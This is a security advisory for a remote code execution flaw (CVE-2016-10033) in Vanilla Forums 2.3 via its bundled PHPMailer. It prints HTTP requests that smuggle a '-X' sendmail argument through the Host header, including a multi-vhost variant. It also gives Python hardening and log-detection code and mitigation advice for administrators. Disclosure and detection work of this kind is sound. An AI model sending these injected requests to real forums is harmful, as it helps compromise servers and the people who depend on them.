I. VULNERABILITY
-------------------------
Vanilla Forums <= 2.3 Unauth. Remote Code Execution (RCE) exploit CVE-2016-10033 [0day]
II. BACKGROUND
-------------------------
"Community Forums Reinvented
Create an online community that your customers will love. Vanilla's forum
software is used by top brands to engage customers, drive loyalty and reduce
support costs."
"Vanilla provides cloud and open source community forum software that powers
discussion forums worldwide with close to 1M downloads.
Built for flexibility and integration, Vanilla is the best, most powerful
community solution in the world."
https://vanillaforums.com/en/software/
https://open.vanillaforums.com/
III. INTRODUCTION
-------------------------
Vanilla Forums software (including the latest stable version of 2.3 in
its default configuration) is affected by:
** Remote Code Execution CVE-2016-10033 (0day) **
which can be exploited by unauthenticated remote attackers to execute
arbitrary code and fully compromise the target application when combined
with Host Header injection vulnerability CVE-2016-10073 (described in
a separate advisory).
IV. DESCRIPTION
-------------------------
As described in the advisory of CVE-2016-10073:
The HOST header is used to form the sender email address as we can see
in the following snippet of code:
```
------[ library/core/class.email.php ]------
...
public function from($SenderEmail = '', $SenderName = '', $bOverrideSender = false) {
    if ($SenderEmail == '') {
        $SenderEmail = c('Garden.Email.SupportAddress', '');
        if (!$SenderEmail) {
            $SenderEmail = 'noreply@'.Gdn::request()->host();
        }
    }
    if ($SenderName == '') {
        $SenderName = c('Garden.Email.SupportName', c('Garden.Title', ''));
    }
    if ($this->PhpMailer->Sender == '' || $bOverrideSender) {
        $this->PhpMailer->Sender = $SenderEmail;
    }
    ob_start();
    $this->PhpMailer->setFrom($SenderEmail, $SenderName, false);
    ob_end_clean();
    return $this;
}
```
In the default configuration of Vanilla (no `Garden.Email.SupportAddress` set) the
Host-derived address is then passed to the PHPMailer library as the sender address in the line:
```
$this->PhpMailer->Sender = $SenderEmail;
```
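The root of the problem is the fallback to `Gdn::request()->host()`: an attacker-controlled header ends up in an address that PHPMailer later places on the `sendmail` command line. The following added example (written for this page in Python rather than the project's PHP, and not Vanilla's or PHPMailer's own code) shows a hardened equivalent of that fallback: it prefers a configured support address and, when it must fall back to the Host header, only accepts a syntactically valid hostname. The names `derive_sender`, `is_valid_host` and `DEFAULT_SUPPORT_ADDRESS` are assumptions introduced for the example.

```python
import re

# Constructed default: empty mirrors a Vanilla install where
# Garden.Email.SupportAddress has not been configured (assumption for this example).
DEFAULT_SUPPORT_ADDRESS = ""

# RFC 1123 hostname label: alphanumerics and hyphens, no leading/trailing hyphen, 1-63 chars.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
# Dotted labels with an optional :port; fullmatch() is used so nothing may follow.
_HOST_RE = re.compile(rf"(?:{_LABEL})(?:\.{_LABEL})*(?::\d{{1,5}})?")


def is_valid_host(host_header: str) -> bool:
    """True only for a plain hostname (optionally host:port); whitespace,
    leading dashes and shell metacharacters all fail the match."""
    return 0 < len(host_header) <= 253 and _HOST_RE.fullmatch(host_header) is not None


def derive_sender(host_header: str, support_address: str = DEFAULT_SUPPORT_ADDRESS) -> str:
    """Hardened counterpart of the fallback in Vanilla's Email::from().

    A configured support address always wins. If the code has to fall back to
    the Host header, a value such as 'vanilla-forums-vhost -X' is refused instead
    of being turned into 'noreply@vanilla-forums-vhost -X' and handed to sendmail.
    """
    if support_address:
        return support_address
    if not is_valid_host(host_header):
        raise ValueError("refusing to build a sender address from untrusted Host header: %r" % host_header)
    hostname = host_header.split(":", 1)[0].lower()  # drop any port; mail domains are case-insensitive
    return "noreply@" + hostname


if __name__ == "__main__":
    print(derive_sender("forum.example.com"))             # noreply@forum.example.com
    for bad in ("vanilla-forums-vhost -X", "arbitrary-string -X", "-X"):
        try:
            derive_sender(bad)
        except ValueError as err:
            print("rejected:", err)
```

The operational takeaway for administrators is the first branch: setting `Garden.Email.SupportAddress` explicitly removes the Host header from the sender path entirely, independent of the PHPMailer version in use.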
The official stable version 2.3 available at:
https://open.vanillaforums.com/addon/vanilla-core-2.3
is bundled with PHPMailer library in version 5.1:
```
-----[ library/vendors/phpmailer/class.phpmailer.php ]----
<?php
/*~ class.phpmailer.php
| Software: PHPMailer - PHP email class
| Version: 5.1
```
This version of PHPMailer is affected by the:
`PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)`
vulnerability also discovered by the author of this advisory
and described in detail at:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
Similarly to the recently disclosed exploit of WordPress Core 4.6 RCE:
https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
remote attackers may exploit the phpmailer vulnerability in Vanilla Forums
by passing the payload (additional parameters to `/usr/sbin/sendmail`) within the HOST
header.
For example, the following web request:
```
POST /vanilla2-3/entry/passwordrequest HTTP/1.1
Host: vanilla-forums-vhost -X
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
Content-Length: 149
hpt=&Target=discussions&ClientHour=2017-05-10+22%3A00&Email=admin&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON
```
would inject the `-X` parameter at the end of the argument list passed to
`/usr/sbin/sendmail`:
```
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-oi]
Arg no. 4 == [-f]
Arg no. 5 == [noreply@attackers_server]
Arg no. 6 == [-X]
```
** NOTE: **
It should be noted that this vulnerability can still be exploited even if the Vanilla
software is hosted on an Apache web server with several name-based vhosts enabled, and
is not the default vhost.
This is possible as the attacker can take advantage of the HTTP/1.0
protocol and specify the exact vhost within the URL. This allows the `HOST`
header to be set to an arbitrary value, as the Apache server will obtain the `SERVER_NAME`
from the provided URL.
This ensures that the malicious request reaches the affected code despite the invalid
vhost within the `HOST` header.
To demonstrate, the above web request could be simply modified to:
```
POST http://vanilla-forums-vhost/vanilla2-3/entry/passwordrequest HTTP/1.1
Host: arbitrary-string -X
```
to achieve the same effect on a host with multiple vhosts.
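Because the attack leaves its trace in the Host header (and, in the multi-vhost variant, in an absolute-URI request line whose host disagrees with it), both are straightforward to hunt for in web server logs, provided the Host header is logged. The following added example (not part of the advisory, and not Vanilla's or Apache's code) scans constructed access-log lines in an assumed Apache `LogFormat` of `"%h %t \"%r\" %>s \"%{Host}i\""` and flags requests whose Host value is not a valid hostname or whose absolute-form request target names a different host. The sample lines, the `find_host_header_injection` function name and the log format are all assumptions made for this example.

```python
import re
from urllib.parse import urlsplit

# Assumed Apache LogFormat (not from the page): "%h %t \"%r\" %>s \"%{Host}i\""
# i.e. client IP, timestamp, request line, status code and the raw Host header.
_LOG_RE = re.compile(
    r'^(?P<client>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) "(?P<host>[^"]*)"$'
)

# RFC 1123 hostname (optionally host:port); anything else in a Host header is suspicious.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOST_RE = re.compile(rf"(?:{_LABEL})(?:\.{_LABEL})*(?::\d{{1,5}})?")


def is_valid_host(value: str) -> bool:
    return 0 < len(value) <= 253 and _HOST_RE.fullmatch(value) is not None


def find_host_header_injection(lines):
    """Return one finding per log line whose Host header looks injected.

    Two signals are checked: the Host value itself is not a hostname (covers the
    'vhost -X' form), and an absolute-URI request line whose URL host differs from
    the Host header (covers the multi-vhost variant described in the note above).
    """
    findings = []
    for line in lines:
        m = _LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue  # unrelated or differently formatted line
        host = m.group("host")
        target = m.group("target")
        reasons = []
        if not is_valid_host(host):
            reasons.append("Host header is not a valid hostname")
        if target.lower().startswith(("http://", "https://")):
            url_host = (urlsplit(target).hostname or "").lower()
            if url_host != host.split(":", 1)[0].lower():
                reasons.append("absolute-URI target host %r differs from Host header" % url_host)
        if reasons:
            findings.append({
                "client": m.group("client"),
                "target": target,
                "host": host,
                "reasons": reasons,
            })
    return findings


# Constructed sample log lines (documentation IP ranges); the first and third
# mirror the two request shapes shown in this advisory, the second is benign.
SAMPLE_LOG = [
    '203.0.113.5 [10/May/2017:22:00:01 +0000] "POST /vanilla2-3/entry/passwordrequest HTTP/1.1" 200 "vanilla-forums-vhost -X"',
    '198.51.100.7 [10/May/2017:22:00:02 +0000] "GET /vanilla2-3/discussions HTTP/1.1" 200 "forum.example.com"',
    '203.0.113.5 [10/May/2017:22:00:03 +0000] "POST http://vanilla-forums-vhost/vanilla2-3/entry/passwordrequest HTTP/1.1" 200 "arbitrary-string -X"',
]

if __name__ == "__main__":
    for f in find_host_header_injection(SAMPLE_LOG):
        print(f["client"], f["target"], repr(f["host"]), "; ".join(f["reasons"]))
```

The same hostname check works as a front-door control: a reverse proxy or WAF rule that rejects requests whose Host header fails it denies the injected value before it reaches the application, which is a useful stopgap until PHPMailer is upgraded to 5.2.18 or later and a fixed support address is configured.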